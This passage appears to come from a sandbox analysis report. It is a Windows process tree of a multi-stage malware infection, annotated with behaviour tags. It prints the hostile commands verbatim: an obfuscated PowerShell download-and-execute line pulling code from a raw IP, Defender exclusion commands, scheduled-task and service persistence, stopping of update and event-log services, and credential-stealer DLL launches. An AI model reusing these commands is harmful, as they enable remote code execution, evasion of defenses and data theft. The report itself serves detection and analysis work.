                                                                              • C:\Windows\system32\attrib.exe
                                                                                attrib +H "in.exe"
                                                                                6⤵
                                                                                • Views/modifies file attributes
                                                                                PID:4304
                                                                              • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                                                                "in.exe"
                                                                                6⤵
                                                                                  PID:9168
                                                                                  • C:\Windows\SYSTEM32\attrib.exe
                                                                                    attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                    7⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:4016
                                                                                  • C:\Windows\SYSTEM32\attrib.exe
                                                                                    attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                    7⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:7224
                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                    schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                    7⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:7328
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell ping 127.0.0.1; del in.exe
                                                                                    7⤵
                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                    PID:6280
                                                                                    • C:\Windows\system32\PING.EXE
                                                                                      "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                      8⤵
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      • Runs ping.exe
                                                                                      PID:1248
                                                                            • C:\Users\Admin\AppData\Local\Temp\1015231001\5a4a10bec4.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\1015231001\5a4a10bec4.exe"
                                                                              4⤵
                                                                                PID:6776
                                                                                • C:\Users\Admin\AppData\Local\Temp\1015231001\5a4a10bec4.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1015231001\5a4a10bec4.exe"
                                                                                  5⤵
                                                                                    PID:6772
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                              2⤵
                                                                              • Enumerates system info in registry
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:2296
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeca30cc40,0x7ffeca30cc4c,0x7ffeca30cc58
                                                                                3⤵
                                                                                  PID:4300
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2
                                                                                  3⤵
                                                                                    PID:944
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2144 /prefetch:3
                                                                                    3⤵
                                                                                      PID:4688
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8
                                                                                      3⤵
                                                                                        PID:5080
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3080 /prefetch:1
                                                                                        3⤵
                                                                                          PID:4224
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1
                                                                                          3⤵
                                                                                            PID:2220
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3660,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3636 /prefetch:1
                                                                                            3⤵
                                                                                              PID:2400
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4672,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:8
                                                                                              3⤵
                                                                                                PID:1044
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5052,i,1692773002472051895,17331489921100250084,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:8
                                                                                                3⤵
                                                                                                  PID:2204
                                                                                              • C:\Users\Admin\AppData\Local\Temp\9C11.tmp.fcxcx.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\9C11.tmp.fcxcx.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1876
                                                                                              • C:\Users\Admin\AppData\Local\Temp\9EC1.tmp.ctx.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\9EC1.tmp.ctx.exe"
                                                                                                2⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Windows directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2144
                                                                                                • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                                                                                                  3⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3312
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                    4⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3588
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                      5⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Loads dropped DLL
                                                                                                      PID:6132
                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                        netsh wlan show profiles
                                                                                                        6⤵
                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                        PID:5248
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\350944739639_Desktop.zip' -CompressionLevel Optimal
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:6020
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                    4⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:6492
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                      5⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Loads dropped DLL
                                                                                                      PID:728
                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                        netsh wlan show profiles
                                                                                                        6⤵
                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                        PID:7400
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\350944739639_Desktop.zip' -CompressionLevel Optimal
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:8728
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                                                                    4⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:8240
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                                                                    4⤵
                                                                                                      PID:2076
                                                                                                • C:\Users\Admin\AppData\Local\Temp\A01A.tmp.AsyncClient.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\A01A.tmp.AsyncClient.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1048
                                                                                                • C:\Users\Admin\AppData\Local\Temp\A3B5.tmp.Build.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\A3B5.tmp.Build.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3428
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    "C:\Windows\explorer.exe"
                                                                                                    3⤵
                                                                                                    • Boot or Logon Autostart Execution: Active Setup
                                                                                                    • Enumerates connected drives
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:4632
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A3B5.tmp.Build.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\A3B5.tmp.Build.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:5212
                                                                                                • C:\Users\Admin\AppData\Local\Temp\ABB5.tmp.cc.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ABB5.tmp.cc.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3880
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
                                                                                                  2⤵
                                                                                                  • Enumerates system info in registry
                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                  PID:7456
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeca30cc40,0x7ffeca30cc4c,0x7ffeca30cc58
                                                                                                    3⤵
                                                                                                      PID:6784
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2344,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=2260 /prefetch:2
                                                                                                      3⤵
                                                                                                        PID:2652
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1812,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=2460 /prefetch:3
                                                                                                        3⤵
                                                                                                          PID:6692
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1980,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=1736 /prefetch:8
                                                                                                          3⤵
                                                                                                            PID:6960
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3116 /prefetch:1
                                                                                                            3⤵
                                                                                                              PID:7064
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3268 /prefetch:1
                                                                                                              3⤵
                                                                                                                PID:6392
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4524 /prefetch:1
                                                                                                                3⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:1580
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4728,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4424 /prefetch:8
                                                                                                                3⤵
                                                                                                                  PID:2152
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4912,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=2328 /prefetch:8
                                                                                                                  3⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:4500
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5012,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=2588 /prefetch:1
                                                                                                                  3⤵
                                                                                                                    PID:4684
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2256,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4880 /prefetch:2
                                                                                                                    3⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:6640
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3816,i,8378179888479825635,15829101467792950949,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=2452 /prefetch:3
                                                                                                                    3⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:6768
                                                                                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                1⤵
                                                                                                                  PID:4464
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                  1⤵
                                                                                                                    PID:1836
                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:2924
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                    1⤵
                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Identifies Wine through registry keys
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4536
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5168
                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:5644
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4240 -ip 4240
                                                                                                                    1⤵
                                                                                                                      PID:6056
                                                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                      1⤵
                                                                                                                        PID:6220
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 584 -p 6784 -ip 6784
                                                                                                                        1⤵
                                                                                                                          PID:2204
                                                                                                                        • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                          C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                          1⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:8948
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c start C:\Windows\temp\4k0qqpbr.js
                                                                                                                            2⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:7384
                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Windows\temp\4k0qqpbr.js"
                                                                                                                              3⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:8104
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='##(N##ew-O###bje###ct N###et.W###e'; $c4='b##Cl####ie##nt##).###D###ow#nl##o##'; $c3='a##dSt####ri#####n###g(''http://176.113.115.178/GO.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('#','');I`E`X $TC|I`E`X
                                                                                                                                4⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:7552
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                                                                                  5⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:8328
                                                                                                                                • C:\Users\Admin\AppData\Roaming\LB311.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\LB311.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:4760
                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                      6⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:7240
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                      6⤵
                                                                                                                                        PID:5632
                                                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                          7⤵
                                                                                                                                            PID:3404
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                          6⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:7384
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                          6⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:7996
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                          6⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:7164
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                                          6⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:8024
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                          6⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:8104
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                          6⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:6544
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                          6⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:7792
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                          6⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:7144
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                          6⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:4476
                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                                                          6⤵
                                                                                                                                            PID:6896
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe delete "LIB"
                                                                                                                                            6⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:8132
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                                                                                            6⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:6524
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                            6⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:7068
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe start "LIB"
                                                                                                                                            6⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:6844
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /IM cmstp.exe /F
                                                                                                                                    2⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:7028
                                                                                                                                • C:\Windows\System32\CredentialUIBroker.exe
                                                                                                                                  "C:\Windows\System32\CredentialUIBroker.exe" NonAppContainer -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:3452
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                                                                                                                                    1⤵
                                                                                                                                      PID:2152
                                                                                                                                    • C:\ProgramData\Mig\Mig.exe
                                                                                                                                      C:\ProgramData\Mig\Mig.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:2636
                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                          2⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:8060
